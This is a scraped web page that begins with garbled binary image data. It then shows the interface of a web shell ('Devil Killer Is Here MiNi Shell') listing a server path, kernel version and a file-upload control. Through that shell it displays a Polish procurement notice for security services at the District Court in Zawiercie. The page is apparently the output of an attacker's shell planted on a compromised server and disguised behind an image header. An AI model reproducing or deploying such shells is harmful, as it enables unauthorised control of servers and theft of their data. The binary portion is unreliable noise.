JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231207/0053927701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Ochrona osób i mienia Sądu Rejonowego w Zawierciu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Rejonowy w Zawierciu</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sąd Rejonowy w Zawierciu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000322235</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Leśna 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawiercie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">32 649 79 66</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@zawiercie.sr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zawiercie.sr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wymiar sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Ochrona osób i mienia Sądu Rejonowego w Zawierciu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-658e2163-9511-11ee-9ee7-e2087ac16d09</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00539277</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-12-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00151359/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Ochrona osób i mienia Sądu Rejonowego w Zawierciu</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-658e2163-9511-11ee-9ee7-e2087ac16d09 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym, a Wykonawcami , w tym wszelkie<br/>oświadczenia, wnioski, zawiadomienia oraz informacje , odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod<br/>adresem : https://ezamowienia.gov.pl .<br/>2) Korzystanie z Platformy e- Zamówienia jest bezpłatne.<br/>3) Wykonawca zamierzający wziąć udział w postepowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „<br/>Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl<br/>oraz informacje zamieszczone w zakładce „ Centrum Pomocy”.<br/>4) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia<br/>ani logowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)Ofertę należy złożyć w języku<br/>polskim, sporządzoną pod rygorem nieważności, w postaci elektronicznej i opatrzoną kwalifikowanym podpisem elektronicznym lub<br/>w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Treść oferty musi być zgodna<br/>z wymaganiami zamawiającego określonymi w dokumentach zamówienia.<br/>2) Oferta musi być podpisana (1) kwalifikowanym podpisem elektronicznym lub (2) podpisem zaufanym lub (3) podpisem osobistym<br/>przez osoby upoważnione do składania oświadczeń woli w imieniu Wykonawcy.<br/>UWAGA : Zamawiający nie będzie uznawał skanów dokumentów nie podpisanych (1) kwalifikowanym podpisem elektronicznym lub<br/>(2) podpisem zaufanym lub (3) podpisem osobistym<br/>3)Oferty, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, podmiotowe środki dowodowe oraz zobowiązanie podmiotu<br/>udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp przedmiotowe środki dowodowe, pełnomocnictwo,<br/>dokumenty o których mowa w art. 94 ust. 2 ustawy Pzp, sporządza się w postaci elektronicznej , w formatach danych określonych w<br/>przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących<br/>zadania publiczne ( tj. dz. U 2021r., poz. 2070 z późn. zm.)<br/>4)Komunikacja w postępowaniu odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji, dostępnych w<br/>zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności<br/>przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również<br/>dołączenie załącznika do przesyłanej wiadomość ( przycisk „ dodaj załącznik”).<br/>5)Możliwość korzystania w postępowaniu z „ Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „<br/>Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie<br/>e-Zamówienia. Do korzystania z „ Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów<br/>zamówienia wystarczające jest posiadanie tzw. Konta uproszczonego na Platformie e-Zamówienia.<br/>6)Wszystkie wysłane i odebrane w Postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>Postepowania w zakładce „ Komunikacja”.<br/>7)Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB ( wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>8)Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy- e Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady UE2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnego rozporządzenia o ochronie danych, RODO),<br/>informujemy, że:<br/>1.Administratorem Państwa danych osobowych jest Dyrektor Sądu Rejonowego w Zawierciu z siedzibą przy ul. Leśnej 4, 42-400<br/>Zawiercie.<br/>2. Kontakt z Inspektorem Ochrony Danych w Sądzie Rejonowym w Zawierciu możliwy jest pod adresem do korespondencji: Sąd<br/>Rejonowy w Zawierciu ul. Leśna 4, 42-400 Zawiercie lub adresem e-mail: iod@zawiercie.sr.gov.pl. *<br/>3. Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. b w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego nr ZP 1/2022 pn. „ Ochrona osób i mienia Sądu Rejonowego w Zawierciu” w trybie przewidzianym dla usług<br/>społecznych w celu zawarcia umowy) RODO lub art. 6 ust. 1 lit. c (obowiązki prawne ciążące na administratorze) RODO, w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego.<br/>4. Państwa dane osobowe przetwarzane będą w celu związanym z potrzebą wyłonienia wykonawcy w ramach postępowań o<br/>udzielenie zamówienia lub organizacji konkursu realizowanych w trybie wynikającym z odpowiednich przepisów prawa lub w celu<br/>zawarcia, realizacji i rozliczenia umowy z Sądem Rejonowym w Zawierciu.<br/>5. Państwa dane osobowe mogą być udostępnione wyłącznie organom lub podmiotom upoważnionym na podstawie odrębnych<br/>przepisów lub podmiotom przetwarzającym dane w imieniu administratora danych.<br/>6. Państwa dane osobowe będą przechowywane przez okres wynikający z przepisów prawa dotyczących archiwizacji.<br/>7. Podanie przez Państwa danych osobowych bezpośrednio Państwa dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp,<br/>8. Państwa dane osobowe nie będą przekazywane do państwa trzeciego lub organizacji międzynarodowej, nie będą poddawane<br/>przetwarzaniu polegającym na zautomatyzowanym podejmowaniu decyzji lub profilowaniu.<br/>9. Posiadają Państwo:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych **;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych<br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO.<br/>10. Nie przysługuje Państwu:<br/>prawo do usunięcia danych osobowych w związku z art. 17 ust. 3 lit. b, d lub e RODO;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych na podstawie art. 21 RODO, gdyż podstawą prawną przetwarzania<br/>Państwa danych osobowych jest art. 6 ust. 1 lit. b lub art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP 3/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usługi w zakresie ochrony osób i mienia na terenie Sądu Rejonowego w<br/>Zawierciu, w budynkach :<br/>1.1 przy ul. Leśnej 4,<br/>1.2 przy ul. Paderewskiego 12,<br/>oraz prowadzenie nadzoru systemu alarmowego, napadowego, kontroli dostępu oraz monitoring systemu telewizji<br/>przemysłowej w budynku Sądu w Zawierciu przy ul. Leśnej 4 i ul. Paderewskiego 12. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79710000-4 - Usługi ochroniarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-01-01 do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dojazd grupy interwencyjnej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy<br/>1.1. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego, na podstawie przepisów ustawy<br/>Pzp(art.108 ust. 1 oraz 109 ust. 1 pkt. 1 i pkt.4 ustawy PZP).<br/>1.2. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego, na podstawie art. 7 ust 1 ustawy z<br/>dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego (Dz. U z 2022 poz. 835 ze zm.) Wykluczenie Wykonawcy następuje<br/>zgodnie z art. 110 i 111 ustawy Pzp.<br/>2. Spełniają warunki udziału w postępowaniu w zakresie:<br/>2.1. Zdolności do występowania w obrocie gospodarczym – Zamawiający nie stawia warunku w powyższym zakresie<br/>2.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Wykonawca spełni warunek jeżeli wykaże, że : posiada ważną koncesję, o której mowa w art. 15 ust. 1 ustawy z dnia 22<br/>sierpnia 1997r. o ochronie osób i mienia tj. (Dz. U. z 2021r., poz. 1995), obejmującą działalność gospodarczą w zakresie<br/>ochrony osób i mienia wskazaną w art. 3 ust. 1 i 2 wskazanej ustawy<br/>2.3. Zdolności zawodowej: Wykonawca spełni warunek, jeżeli wykaże, że:<br/>należycie wykonał w okresie ostatnich trzech lat lub należycie wykonuje co najmniej dwie usługi fizycznej ochrony osób i<br/>mienia w obiekcie (lub obiektach) użyteczności publicznej, obejmujące sprawowanie ochrony zarówno wewnątrz jak i na<br/>zewnątrz budynku (budynków), świadczone w co najmniej w dwóch obiektach objętych jedną usługą, o wartości nie mniej niż 400.000,00 zł każda - za okres dowolnych, wskazanych przez wykonawcę, kolejnych 12 miesięcy obejmujące sprawowanie ochrony osób i mienia oraz konserwacji lub napraw urządzeń technicznych, o których mowa w art. 3 ust. 2<br/>ustawy z dnia 22 sierpnia 1997r. o ochronie osób i mienia.<br/> dysponuje co najmniej 6 (sześcioma) osobami - kwalifikowanymi pracownikami ochrony uprawnionymi do wykonywania<br/>czynności opisanych w art. 3 ust. 1 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia,<br/> dysponuje co najmniej 1 (jedną) osobą - kwalifikowanym pracownikiem ochrony uprawnionym do wykonywania czynności<br/>opisanych w art. 3 ust. 2 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i mienia, posiadającym kwalifikacje określone w<br/>§5 ust.1 pkt 1 i 2 dla urządzeń wskazanych w Załączniku nr 1 Grupa 1 pkt 2 rozporządzenia Ministra Klimatu i Środowiska z<br/>dnia 01 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się<br/>eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2022 poz. 1392)<br/>dysponuje co najmniej 1 (jedną) osobą – pracownikiem posiadającymi kwalifikacje do usuwania usterek w systemach<br/>alarmowych, w tym posiadają kwalifikacje określone w §5 ust.1 pkt 1 dla urządzeń wskazanych w Załączniku nr 1 Grupa 1<br/>pkt 2 rozporządzenia Ministra Klimatu i Środowiska z dnia 01 lipca 2022 r. w sprawie szczegółowych zasad stwierdzania<br/>posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. z 2022r. poz. 1392).<br/>2.4. Zdolności technicznej<br/>Wykonawca spełni warunek jeżeli wykaże, że dysponuje:<br/>co najmniej jednym centrum monitorowania sygnałów elektronicznych (alarmowych, antynapadowych) poprzez przesyłanie<br/>i odbiór sygnałów przekazywanych za pośrednictwem operatorów publicznych,<br/>co najmniej dwoma oznakowanymi samochodami patrolowymi; oznaczenia wskazujące przedsiębiorcę i charakter działalności - ochrona,<br/> co najmniej 5 (pięcioma) urządzeniami (osobistymi) do prowadzenia bezpośredniej i stałej łączności na wydzielonej<br/>częstotliwości oraz ważnym zezwoleniem Urzędu Komunikacji Elektronicznej w sprawie przydziału częstotliwości i<br/>zezwolenie na używanie urządzeń radiokomunikacyjnych, wydane na podstawie art. 145 ustawy z dnia 16 lipca 2004 r.<br/>Prawo telekomunikacyjne (tj. Dz. U. z 2021r. poz. 576 ze zm.)<br/>2.5. Sytuacji ekonomicznej lub finansowej<br/>Wykonawca spełni warunek jeżeli wykaże, że:<br/>jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na sumę gwarancyjną nie mniejszą niż 2.000.000,00 zł, dla jednej i wszystkich szkód. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz oświadczeń lub<br/>dokumentów składanych przez Wykonawcę w postępowaniu na wezwanie Zamawiającego w zakresie braku podstaw do<br/>wykluczenia:<br/>2.1. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy PZP,<br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2.2. informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2 i 4,<br/>a także w art. 109 ust. 1 pkt 2 lit. a) i b) oraz pkt 3 ustawy PZP wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu<br/>składania ofert (oryginał lub kopia potwierdzona „za zgodność z oryginałem”),<br/>2.3. oświadczenie Wykonawcy o przynależności (lub nie) do tej samej grupy kapitałowej, o której mowa w art. 108 ust. 1 pkt 5 ustawy<br/>PZP wraz z listą ewentualnych podmiotów należących do tej samej grupy kapitałowej – załącznik nr 9 do SWZ<br/>2.4. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków<br/>i opłat w zakresie art. 109 ust. 1 pkt 1 ustawy PZP, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania<br/>ofert, lub inny dokument potwierdzający, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat<br/>tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,<br/>odroczenia lub rozłożenia na raty zaległych płatności lub wstrzymania w całości wykonania decyzji właściwego organu,<br/>2.5. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego<br/>Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na<br/>ubezpieczenia społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt. 1 ustawy PZP, wystawionego nie wcześniej niż 3 miesiące<br/>przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu lub innego dokumentu<br/>potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi<br/>odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych<br/>płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w 